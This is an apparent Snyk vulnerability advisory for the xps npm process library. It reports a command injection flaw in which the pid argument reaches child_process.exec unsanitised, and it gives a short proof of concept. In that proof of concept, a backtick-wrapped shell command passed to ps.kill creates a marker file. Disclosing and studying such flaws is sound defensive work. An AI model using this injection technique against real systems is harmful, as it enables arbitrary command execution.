xps@1.0.0 vulnerabilities

Cross-platform library for listing and killing processes.

Direct Vulnerabilities

Known vulnerabilities in the xps package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • C
Command Injection

xps is a cross-platform library for listing and killing processes.

Affected versions of this package are vulnerable to Command Injection. The argument pid is used to build the command that is passed to the child_process.exec function without any sanitization.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/
    
  2. install latest vulnerable xps module (v1.0.2): npm i xps@1.0.2

  3. create the following PoC JavaScript file (poc.js):

    const ps = require('xps');
    ps.kill('`touch HACKED;`').fork();
    
  4. make sure that the HACKED file does not exist: ls

  5. execute the poc.js file: node poc.js

  6. the HACKED file is created: ls

How to fix Command Injection?

Upgrade xps to version 1.0.3 or higher.

<1.0.3